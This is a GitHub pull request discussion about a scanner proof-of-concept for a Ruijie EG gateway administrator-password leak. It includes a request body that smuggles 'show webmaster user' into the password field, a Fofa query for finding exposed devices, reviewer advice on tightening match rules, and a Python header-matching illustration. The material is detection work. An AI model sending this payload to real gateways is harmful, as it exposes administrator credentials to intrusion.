Create ruijie-eg-info-leak #1214
Conversation
pocs/ruijie-eg-info-leak.yml (outdated)
body: |
  username=admin&password=admin?show+webmaster+user
expression: |
  response.status == 200 && "{\"data\":\".*?(\\w+)\\s(\\w+)\",\"status\":1}".bmatches(response.body)
The matching rule here is rather weak and prone to false positives. I suggest verifying by requesting a page that requires login.
Changed.
pocs/ruijie-eg-info-leak.yml (outdated)
body: |
  username={{username}}&password={{password}}
expression: |
  response.status == 200 && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}")
The matching rule here is still too weak and prone to false positives. I suggest adding a match on Ruijie-specific features; I saw in the response headers: Set-Cookie: RUIJIEID....... which could be added to the matching rule. Also, after response.status == 200, I suggest adding a match on Content-Type.
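The reviewer's point above, as an added illustration that is not part of this PR or of the scanner's own code: a small Python check that compares the body-only rule with one that also requires a Content-Type header and a RUIJIEID Set-Cookie header. Both HTTP responses are constructed for the example, the session id is a placeholder, and the JSON Content-Type is an assumption (the comment only says to match on Content-Type).

```python
from typing import Dict, List, Tuple

# Constructed sample responses for illustration; neither was captured from a real host.
VENDOR_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json; charset=utf-8\r\n"  # assumed JSON content type
    "Set-Cookie: RUIJIEID=placeholder-session-id; path=/\r\n"  # placeholder cookie value
    "\r\n"
    '{"data":"0","status":1}'
)
# An unrelated service that happens to return the same JSON: the body-only rule flags it.
GENERIC_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '{"data":"0","status":1}'
)

EXPECTED_BODY = b'{"data":"0","status":1}'


def parse_response(raw: str) -> Tuple[int, Dict[str, List[str]], bytes]:
    """Split a raw HTTP/1.1 response into status code, lower-cased headers and body bytes."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers: Dict[str, List[str]] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body.encode()


def weak_match(raw: str) -> bool:
    """Rule as submitted: status 200 and the JSON marker somewhere in the body."""
    status, _, body = parse_response(raw)
    return status == 200 and EXPECTED_BODY in body


def strong_match(raw: str) -> bool:
    """Reviewer's version: also require a JSON Content-Type and a RUIJIEID cookie."""
    status, headers, body = parse_response(raw)
    content_type = headers.get("content-type", [""])[0]
    has_vendor_cookie = any(c.startswith("RUIJIEID=") for c in headers.get("set-cookie", []))
    return (
        status == 200
        and content_type.startswith("application/json")
        and has_vendor_cookie
        and EXPECTED_BODY in body
    )
```

Running weak_match on both responses returns True, so the generic server would be reported; strong_match only accepts the response carrying the vendor cookie and JSON content type.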
What vulnerability does this PoC detect?
Ruijie gateway (RG-EG) information leak of the administrator account password
Test environment
Fofa: app="Ruijie-EG易网关"
Notes
Please use the following system to test the PoC: